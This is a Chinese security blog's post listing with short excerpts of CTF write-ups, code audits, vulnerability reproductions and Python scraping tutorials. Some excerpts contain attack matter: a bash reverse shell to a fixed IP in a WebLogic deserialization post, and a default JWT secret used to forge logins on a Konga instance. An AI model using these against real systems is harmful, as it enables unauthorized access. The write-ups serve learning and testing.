- 博客(147)
- 收藏
- 关注
RSS订阅翻译 Scrapy 初学者系列第 1 部分:如何构建你的第一个生产级 Scrapy
第一部分:ScrapySpider在本教程的第 1 部分:基本 Scrapy Spider中,我们将介绍:什么是 Scrapy?如何设置我们的 Python 环境如何设置我们的 Scrapy 项目创建我们的 Scrapy Spider使用 Scrapy Shell 查找我们的 CSS 选择器如何运行我们的 Scrapy Spider,以及以 CSV 或 JSON 格式输出数据如何浏览页面在本系列中,我们将从Chocolate.co.uk抓取产品。
2024-09-19 22:26:20
284
原创 Requests 库
如果您的应用程序等待响应的时间过长,则对您服务的请求可能会积压,您的用户体验可能会受到影响,或者您的后台作业可能会挂起。到目前为止,您已经发出了很多不同类型的请求,但它们都有一个共同点:它们都是对公共 API 的未经身份验证的请求。现在,您可以使用这种更直观的方式与基于令牌的身份验证方案(例如 GitHub 的 API 部分所需的方案)进行交互。您需要调整请求正文中发送的数据,以满足您与之交互的服务的特定需求。当您的应用想要再次连接到同一台服务器时,它将重用池中的连接,而不是建立新连接。
2024-09-18 20:46:28
1106
原创 Python 解析
所以我们使用etree对象中的xpath方法根据xpath表达式去解析文件内容。实例化一个etree对象,且需要将被解析的页面源码数据加载到该对象中。2. 调用etree对象中的xpaht方法实现标签定位和内容获取,如果有标签有内容,也可以使用 get_text()快捷键 Ctrl + shift +x 启动。如果标签里面只有内容可以使用,string方法。属性定位:tag[@attr=value]如果标签里面还有标签就会输出None。添加 Limit 是选择前几个。索引定位:tag[索引]
2024-09-18 20:45:07
1321
原创 python3 URllib 库
User Agent中文名为用户代理,简称 UA,它是一个特殊字符串头,使得服务器能够识别客户使用操作系统及版本、CPU 类型、浏览器及版本。浏览器内核、浏览器渲染引擎、浏览器语言、浏览器插件等。第一次 本地 ,第二次挂的代理。添加User-Agent。urlencode 编码。GET请求 并写入文件。
2024-09-18 20:44:21
654
原创 ctfshow - 代码审计 入门篇
dao.php 里面的 dao类 调用了 close 而且是使用了 __destruct 函数 ,结束的时候会调用这个魔法函数。这里是使用了 file_put_centents函数 ,然后可以写shell 控制 titele 和 info。在checklogin的时候发现了sql注入 ,但是是延时注入。admin是密码 ,用户名也是admin。有点抽象了 ,看了其他wp说是可以。增加了过滤,只能字母,不能出现符号。gopherus生成 poc。之前的方法都不能绕过了。读取nginx配置文件。
2024-09-10 21:33:25
725
原创 CTFshow -Java
而由于struts2-struts1-plugin 包中的 “Struts1Action.java” 中的 execute 函数可以调用 getText() 函数,这个函数刚好又能执行OGNL表达式,同时这个 getText() 的 参数输入点,又可以被用户直接进行控制,如果这个点被恶意攻击者所控制,就可以构造恶意执行代码,从而实现一个RCE攻击。Struts框架被强制执行时,对分配给某些标签的属性值进行双重评估,因此可以传入一个值,当一个标签的属性将被渲染时,该值将被再次评估。
2024-09-09 19:34:48
1862
原创 春秋云镜-任意文件读取与任意文件上传
Jenkins 2.441及更早版本,以及LTS 2.426.2及更早版本没有禁用其CLI命令解析器的一个功能,该功能会将参数中’@'字符后跟的文件路径替换为该文件的内容,允许未经身份验证的攻击者读取Jenkins控制器文件系统上的任意文件。s=/Template/edit/path/Cuppa CMS v1.0 administrator/templates/default/html/windows/right.php文件存在任意文件读取漏洞。/flag 即可进行文件读取。进入后台后位置处 输入/…
2024-09-05 22:23:12
1466
原创 SRC挖掘中的权限绕过,导致的任意用户登录
在挖src中遇到的一个ndayhttps://konga-xxxxx.com/由于 Konga 使用了默认的 密钥 可以构造jwt来造成任意用户登录漏洞利用:先使用 jwt网站来构造https://jwt.io/#debugger-iooursecret 密钥生成的值:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.MQ.gSssTBEVe6X9aFEd0H_tt8kk2...
2024-09-05 15:14:55
232
原创 新锋管理商城系统审计
ewbee-mall是一套电商系统,包括基础版本(Spring Boot+Thymeleaf)、前后端分离版本(Spring Boot+Vue 3+Element-Plus+Vue-Router 4+Pinia+Vant 4) 、秒杀版本、Go语言版本、微服务版本(Spring Cloud Alibaba+Nacos+Sentinel+Seata+Spring Cloud Gateway+Open...
2024-09-04 17:03:17
881
原创 新锋管理商城系统代码审计
ewbee-mall是一套电商系统,包括基础版本(Spring Boot+Thymeleaf)、前后端分离版本(Spring Boot+Vue 3+Element-Plus+Vue-Router 4+Pinia+Vant 4) 、秒杀版本、Go语言版本、微服务版本(Spring Cloud Alibaba+Nacos+Sentinel+Seata+Spring Cloud Gateway+Open...
2024-09-04 17:03:17
899
原创 网神IDS 入侵检测系统
入侵检测系统(intrusion detection system,简称“IDS”)是一种对[网络传输](https://baike.baidu.com/item/%E7%BD%91%E7%BB%9C%E4%BC%A0%E8%BE%93/1873698?进行即时监视,在发现可疑传输时发出警报或者采取主动反应措施的网络安全设备。它与其他网络安全设备的不同之处便在于,IDS是一种积极主动的安全防护技术。
2024-09-03 22:28:27
617
原创 网神IPS 入侵防御系统
入侵防御系统是对[防病毒软件](https://baike.baidu.com/item/%E9%98%B2%E7%97%85%E6%AF%92%E8%BD%AF%E4%BB%B6/16975725?(Antivirus Programs)和防火墙(, Application Gateway)的补充。入侵防御系统(Intrusion-prevention system)是一部能够监视网络或网络设备。
2024-09-03 22:27:30
377
原创 网神WAF Web应用防火墙
Web应用防火墙系统是以网站或应用系统为核心的安全产品,通过对HTTP或HTTPS的Web攻击行为进行分析并拦截,有效的降低网站安全风险。产品主要部署在网站服务器的前方。Web应用防火墙是一种针对Web应用程序的安全设备,用于检测和阻止Web攻击,并保护Web应用的安全性。可以有效地缓解网站及Web应用系统面临如0WASP TOP 10中定义的常见威胁;可以快速地应对恶意攻击者对Web业务带来的冲击。让网站免遭Web攻击侵扰并对网站代码进行合理加固。
2024-09-03 22:26:55
1034
原创 网神SIS 安全隔离与信息交换系统
安全隔离和信息交换系统是为了保护计算机系统和网络中的敏感数据、资源和功能而设计的。它们在不同的场景中提供了安全性、隔离性和控制性。
2024-09-03 22:26:16
1575
原创 安域 网站应用安全云防护
安域是集合网站攻击防护、DDoS/CC/爬虫攻击防护、CDN加速、网站只读/全站镜像(降低篡改机率)、网站安全告警、安全可视化、统一安全管理等多维度的安全能力于一体的SaaS化综合防护产品- 应用场景:适用于各类网站、电子商务平台、在线服务等需要保护网站应用免受攻击的场景。- 部署方式:通过将网站流量导入云端进行实时防护,可以使用CDN(内容分发网络)将流量引导到云防护平台,或者在本地服务器上设置代理将流量传输到云端。
2024-09-03 22:23:48
476
原创 边界---新
路由器是连接不同网络的设备,它负责将数据包从一个网络转发到另一个网络,在网络中扮演着数据流量的传输和导向角色,防火墙可以检测和阻止潜在的恶意流量,过滤不符合规则的数据包,IPS再对网络流量进行深度分析和检测,识别和拦截各种威胁。防火墙就像是一个坚固的城墙,保护企业的网络不受外部威胁的侵害,它拥有强大的策略,规则 ,特征库,可以根据需求进行安全配置,阻止不必要的访问和恶意行为, 同时确保合法的数据传输正常,时刻保护着企业的核心资产和敏感数据。它们能够防止未经授权的访问和信息泄露,保护企业的数据和机密信息。
2024-09-03 22:23:18
1289
原创 新锋管理商城系统
ewbee-mall是一套电商系统,包括基础版本(Spring Boot+Thymeleaf)、前后端分离版本(Spring Boot+Vue 3+Element-Plus+Vue-Router 4+Pinia+Vant 4) 、秒杀版本、Go语言版本、微服务版本(Spring Cloud Alibaba+Nacos+Sentinel+Seata+Spring Cloud Gateway+OpenFeign+ELK)。
2024-09-03 19:18:35
1526
原创 RBAC管理系统代码审计
基于SpringBoot+SpringSecurity的RBAC管理系统项目地址:GitHub - witmy/my-springsecurity-plus: ☕基于SpringBoot+SpringSecurity的RBAC管理系统,易读易懂????组件<?xmlversion="1.0"encoding="UTF-8"?><projectxmlns="http://mave...
2024-09-02 21:53:11
516
原创 春秋云镜-SQL注入-漏洞复现
靶标介绍:Wuzhicms v4.1.0 被发现存在一个 SQL 注入漏洞,该漏洞通过位于的$keywords参数触发。靶场问题需要加上路径输入账号密码 admin/admin123抓取这个包加上我们已知的 sql注入参数。
2024-09-02 21:28:25
1136
1
原创 春秋云镜-RCE靶场漏洞复现
CVE-2023-26469image.png靶标介绍:Jorani是一款开源的员工考勤和休假管理系统,适用于中小型企业和全球化组织,它简化了员工工时记录、休假请求和审批流程,并提供了多语言支持以满足不同地区的需求。在 Jorani 1.0.0 中,攻击者可以利用路径遍历来访问文件并在服务器上执行代码。第一步获取COOKIE:第二部构造POCPOST/session/loginHTTP/1.1...
2024-09-02 21:22:19
2750
原创 SUCTF 2018——Anonymous(create_function 函数 的 php匿名函数 _x00lambda_)
create_function的匿名函数也是有名字的,名字是\x00lambda_%d,其中%d代表他是当前进程中的第几个匿名函数。
2024-09-01 12:12:55
369
原创 vnctf2024- CutePath
通过查找可以发现flag在flag/flag/flag.txt 里面。那我们看不了flag.txt 能不能使用目录遍历把这个替换为flag。抓包发现 ,他这里old 老的 ,带有一个/a.php ,当读到第一级目录的时候 ,发现存在一个base系列的编码。上传一个一句话 ,但是不解析,测试了很多后缀都无果。通过测试这个filepath参数可以目录遍历。登录成功发现多了很多功能,存在一个文件上传。思路就是把old 替换为flag的地址。有个二维码 ,扫码访问和点击是一样的。历史包存在这么一个参数。
2024-09-01 12:12:25
332
原创 CTFshow反序列化-web254-270
看着代码挺多 一步步看首先定位怎么拿flag主要是是这段如果username和u相等,password和p 相等执行下一句 赋值 ,然后 返回 isvip等于true我们直接让isvip 等于true ,然后输入username的时候等于 源代码里面的值其实就是个判断都还没开始上序列化。
2024-08-31 21:20:30
1885
原创 myCTF
是存在flag.php 文件的点击抓包 ,查看返回包有一串flag base64 编码解密查看源代码在这种情况下,代码将设置一个名为 “X-Powered-By” 的 HTTP 响应头,值为 “Custom-Powered”。ereg 存在百分号00 截断然后 截断之后绕过了第一个if 就认为结束了strpos 存在函数 第一次出现的位置 ,是不是#testaasafd 是返回true然后再%00 后面接上 #testaasafd就绕过了。
2024-08-31 21:18:40
920
原创 weblogic 反序列化(CVE-2020-2883)
描述: Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。“bash -i >& /dev/tcp/172.18.52.33/11111 0>&1” 这一段是需要进行编译的。前面是的 nc 监听 一直出问题 我的 监听ip 出错了 所以一直错 一直监听不到。后面换了windows 使用子系统去运行 poc poc 应该没问题 可能是 监听问题。用的kali 监听 很慢 一直返回不了 shell。
2024-08-31 21:17:55
855
原创 迷你天猫商城代码审计
迷你天猫商城是一个基于Spring Boot的综合性B2C电商平台环境要求:1、Windows 10系统。2、Java版本为1.8.0_261。3、Mysql版本为5.7。
2024-08-30 22:22:50
1953
原创 CTFshow-文件上传web161-170
一开始发现不管输入什么都不行 ,添加了GIF头成功通过上传校验第二步上传 图片,包含了日志的文件 进行解析第三步访问 /upload 目录会解析 日志文件添加user-agent 头里面 添加一句话第四步 连接shell 获取flag。
2024-08-12 14:37:51
340
原创 CTFshow-特性web105-128
第一个foreachget传入的值不能带有error 这个好绕然后 值给key比如是?a = ba就变成了b (有点乱。直接覆盖掉a了)第二个 foreachpost传入的要等于flag 不然die第三个post传入的值,不能等于flag简单明了的思路就是我们直接覆盖掉error ,让error等于flagget传入?suces=flag 绕过第一个foreachpost传入error=suces ,然后error就等于$flag。
2024-08-12 14:36:37
425
原创 CTFshow-特性web89-104题
第一个if 传入 num第二个if判断是不是数字 如果是就 die 结束第三个if intval函数preg_match当检测的变量是数组的时候会报错并返回0。而intval函数当传入的变量也是数组的时候,会返回1所以使用数组绕过?num[]=1。
2024-08-12 14:36:03
364
原创 CTFshow-RCE69-77 _ 118-124题
代码和前面的题目差不多,但是这里做了限制不能高亮显示还是post传c使用68题的payload依旧是可以的 查看wp发现新函数。
2024-08-02 17:21:32
1032
原创 CTFshow-RCE49-68题
具体来说,readgzfile 函数用于读取一个经过 gzip 压缩的文件并将其内容直接输出到浏览器,而不需要显式地使用文件句柄和循环。在这个例子中,读取的文件是 “/flag.txt”。这段代码使用 PHP 语言中的 readgzfile 函数来读取一个经过 gzip 压缩的文件 “/flag.txt” 的内容。细看 没有过滤 $ 可以使用IFS这种了 前面都过滤了的。看着这个函数其实是执行了的 ,但是我们的flag不在这里。经过测试 输入的{nl,a.txt} 他是不被执行的。
2024-08-02 17:20:31
593
原创 CTFSHOW-web373-378
在vps上创建一个test.dtd文件,用于反弹shell,内容如下。要绕过 http 就要进行编码绕过 编码为 utf-16。和上题的代码差别不大 ,但是没有输出了,无回显数据。要使用远程服务器 加载 dtd文件。VPS收到flag的base64。以及可以使用这个payload。上面的payload 不行了。这里他不能带有 http了。查看flag的payload。输入的内容不能带那个。
2024-08-01 20:34:53
499
原创 CTFSHOW-文件包含13题
传入file 值 ,然后include 包含传入的file发现打不开 ,靠 ,可能是过滤了,但是是能读/etc/passwd使用php://filter 伪协议读取 flag还有一种 data协议读取执行命令读取flagcat flag。
2024-08-01 20:34:23
445
原创 字符串逃逸基础
反序列化以;}结束,后面的字符串不影响正常的反序列化一般在数据先经过一次serialize再经过unserialize,在这个中间反序列化的字符串变多或者变少的时候有可能存在反序列化属性逃逸。这样是反序列不了 , 成员属性 不对 $b成员属性是两个所以要改成s:3:“a"b”;是字符还是格式符号 ,是由字符串长度3 来判断的在前面字符串没有问题的情况下,;}是反序列化结束符,后面的字符串不影响反序列化结果没有问题指的是三个一致:成员属性数量一致成员属性名称长度一致,内容长度一致。
2024-07-31 09:51:13
434
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人